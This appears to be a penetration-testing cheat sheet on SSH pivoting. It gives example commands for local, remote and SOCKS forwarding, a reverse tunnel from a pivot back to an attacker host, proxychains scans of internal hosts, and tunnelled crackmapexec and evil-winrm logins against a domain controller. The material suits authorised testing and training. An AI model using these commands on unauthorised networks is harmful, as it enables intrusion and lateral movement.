SSH TUNNELING

Local port forward

Access internal:80 via your localhost:8080 — Browse internal web apps

ssh -L 8080:INTERNAL_TARGET:80 user@PIVOT_HOST
Example Output
ssh -L 8080:172.16.1.10:80 john@10.10.14.5

Now browse: http://127.0.0.1:8080
(Your browser is talking to 172.16.1.10:80 through the pivot. The 8080 listener binds to your loopback only; give it a bind address, e.g. -L 0.0.0.0:8080:172.16.1.10:80, if other hosts must reach it)

Remote port forward

Run on the pivot, pointing back at your box. Opens a listener on the SSH server side (your machine) that forwards to something only the pivot can reach. This is the mirror image of -L: the listener lands on the server, the destination is resolved from the client.

ssh -R 9090:127.0.0.1:80 user@ATTACKER_IP
Example Output
ssh -R 9090:127.0.0.1:80 attacker@10.10.14.2

On attacker: curl http://127.0.0.1:9090
(Reaches the pivot's localhost:80 from your machine. Your box needs sshd listening and ideally a throwaway account for the pivot to log in with. The 9090 listener binds to loopback unless GatewayPorts is set in sshd_config.)
The same flag run the other way, from your box, exposes your tools instead: ssh -R 8443:127.0.0.1:443 user@PIVOT_HOST makes your port 443 reachable at the pivot's localhost:8443

Dynamic SOCKS proxy

SOCKS proxy through pivot — Route any tool through pivot

ssh -D 1080 user@PIVOT_HOST
Example Output
ssh -D 1080 john@10.10.14.5

Edit /etc/proxychains4.conf, replacing the default entry under [ProxyList] with:
socks5 127.0.0.1 1080

proxychains nmap -sT -Pn 172.16.1.10
(Scan internal network through pivot. -sT is required: SOCKS only relays full TCP connections, so SYN scans and ICMP/ARP probes cannot go through it; -Pn skips the host-discovery probes that would otherwise fail and mark every host as down)

Use SOCKS proxy

Prepend proxychains to any TCP tool. Needs socks5 127.0.0.1 1080 under [ProxyList] in /etc/proxychains4.conf; enable proxy_dns there too so internal hostnames resolve through the tunnel instead of leaking to your own resolver.

proxychains nmap -sT -Pn INTERNAL_TARGET
proxychains crackmapexec smb INTERNAL_TARGET
Example Output
proxychains nmap -sT -Pn 172.16.1.10
ProxyChains | S-chain |->127.0.0.1:1080

PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
445/tcp open  microsoft-ds
(Scanning internal network through pivot. Every port probe is its own TCP connection over the tunnel, so scan a port list, e.g. -p 22,80,445,3389, or --top-ports 100, rather than nmap's default 1000 ports)

SSH with key + tunnel

Multiple port forwards at once — Forward several services

ssh -i id_rsa -L 445:DC_IP:445 -L 5985:DC_IP:5985 user@PIVOT
Example Output
ssh -i id_rsa -L 445:172.16.1.10:445 -L 5985:172.16.1.10:5985 john@10.10.10.5

Now on attacker:
crackmapexec smb 127.0.0.1 -u admin -p Pass
evil-winrm -i 127.0.0.1 -u admin -p Pass
(Multiple internal ports forwarded at once. Binding local 445 needs root, so run it as sudo ssh ..., and it fails if a local smbd already owns 445; the key file must be mode 600 or ssh refuses it. Add -o ExitOnForwardFailure=yes so a bind that fails aborts the session instead of leaving a half-working tunnel)

Persistent SSH tunnel

Background tunnel — -f background, -N no commands, -T no TTY

ssh -fNT -L 8080:INTERNAL:80 user@PIVOT
Example Output
ssh -fNT -L 8080:172.16.1.10:80 john@10.10.10.5

(Returns to prompt, tunnel runs in background)
curl http://127.0.0.1:8080
(Access internal web app while working. Add -o ServerAliveInterval=30 so a dropped connection is noticed instead of hanging silently. Tear it down with pkill -f "ssh -fNT -L 8080" when done; if you started it with -M -S /tmp/pivot.sock, ssh -S /tmp/pivot.sock -O exit PIVOT closes it cleanly)